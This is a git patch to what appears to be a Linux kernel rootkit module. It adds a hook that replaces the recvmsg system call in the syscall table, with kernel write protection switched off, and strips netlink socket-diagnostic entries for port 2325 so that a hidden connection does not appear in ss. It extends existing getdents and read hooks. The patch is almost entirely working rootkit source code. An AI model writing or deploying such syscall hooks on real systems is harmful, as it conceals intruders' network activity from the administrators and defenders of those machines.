From 3e30a6df32ee4d5c3f374b26d9e2a694154bbd9c Mon Sep 17 00:00:00 2001
From: Jan Koerner <jankoerner.1998@gmail.com>
Date: Sun, 8 Dec 2019 13:33:50 +0100
Subject: [PATCH] Socket von ss verstecken

---
 src/8008135.c          |  3 ++
 src/h1d3p0r7.c         | 77 ++++++++++++++++++++++++++++++++++++++++++
 src/headers/h1d3p0r7.h |  8 +++--
 3 files changed, 86 insertions(+), 2 deletions(-)

diff --git a/src/8008135.c b/src/8008135.c
index 851ce00..2484f63 100644
--- a/src/8008135.c
+++ b/src/8008135.c
@@ -35,11 +35,13 @@ static int __init init_8008135(void) {
 
 	sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
 	sys_read_orig	  = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
+	sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
 
 	wprotectionoff();
 
 	sys_call_table[__NR_getdents] = sys_getdents_new;
 	sys_call_table[__NR_read]     = sys_read_fake;
+	sys_call_table[__NR_recvmsg]  = my_recvmsg_syscall;
 
 	wprotectionon();
 
@@ -63,6 +65,7 @@ static void __exit exit_8008135(void) {
 
 	sys_call_table[__NR_getdents] = sys_getdents_orig;
 	sys_call_table[__NR_read] 	  = sys_read_orig;
+	sys_call_table[__NR_recvmsg]  = sys_recvmsg_orig;
 
 	wprotectionon();
 }
diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c
index 026f7b5..5d16ec0 100644
--- a/src/h1d3p0r7.c
+++ b/src/h1d3p0r7.c
@@ -27,6 +27,7 @@
 *******************************************************************************/
 
 sys_read_ptr sys_read_orig;
+original_recvmsg_syscall sys_recvmsg_orig;
 
 /*******************************************************************************/
 
@@ -106,3 +107,79 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
 	// return number of bytes read
 	return result;
 }
+
+/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
+   `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
+   socket with the help of some netlink utility macros. If a netlink socket is being used, we
+   iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
+   source and destination ports with our list of hidden ones. In order to hide an entry we copy
+   the remaining entries over it and adjust the data length which is returned to the user. */
+
+asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
+{
+	long ret;
+	struct nlmsghdr *nlh;
+	long count;
+	int found;
+	char *stream;
+	int offset;
+	int i;
+	struct inet_diag_msg *r;
+	int port;
+	/* Call original `recvmsg` syscall */
+	ret = sys_recvmsg_orig(sockfd, msg, flags);
+
+	/* Some error occured. Don't do anything. */
+	if (ret < 0)
+		return ret;
+
+	/* Extract netlink message header from message */
+	nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
+
+	/* Number of bytes remaining in message stream */
+    count = ret;
+
+	/* Set flag specifying whether message contains data to be masked */
+	found = 1;
+
+	/* NLMSG_OK: This macro will return true if a netlink message was received. It
+	   essentially checks whether it's safe to parse the netlink message (if indeed
+	   is a netlink message) using the other NLMSG_* macros. */
+	while (NLMSG_OK(nlh, count)) {
+
+		if (found == 0)
+			/* NLMSG_NEXT: Many netlink protocols have request messages that result
+			   in multiple response messages. In these cases, multiple responses will
+			   be copied into the `msg` buffer. This macro can be used to walk the
+			   chain of responses. Returns NULL in the event the message is the last
+			   in the chain for the given buffer. */
+			nlh = NLMSG_NEXT(nlh, count);
+		
+		r = NLMSG_DATA(nlh);
+		port = ntohs(r->id.idiag_sport);
+		if(port == 2325){
+			/* Message contains data to be masked */
+			found = 1;
+		}else{
+			found = 0;
+			continue;
+		}
+
+
+		stream = (char *) nlh;
+
+		/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
+		   up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
+		offset = NLMSG_ALIGN((nlh)->nlmsg_len);
+
+		/* Copy remaining entries over the data to be masked */
+		for (i=0 ; i<count ; i++)
+			stream[i] = stream[i + offset];
+
+		/* Adjust the data length */
+		ret -= offset;
+	}
+
+	return ret;
+}
+
diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h
index a9e8e8b..21aacb7 100644
--- a/src/headers/h1d3p0r7.h
+++ b/src/headers/h1d3p0r7.h
@@ -36,23 +36,27 @@
 #include <linux/version.h>
 #include <net/tcp.h>
 #include <net/udp.h>
+#include <linux/inet_diag.h>	/* Needed for ntohs */
 
 
 #define __NR_read				0
-
+#define __NR_recvmsg			47
 
 
 typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
 										char __user *buf,
                                         size_t count);
+typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
 
 
 /**** var **********************************************************************
 *******************************************************************************/
 
 extern sys_read_ptr sys_read_orig;
-
 extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
                             		 size_t count);
 
+extern original_recvmsg_syscall sys_recvmsg_orig;
+extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
+
 #endif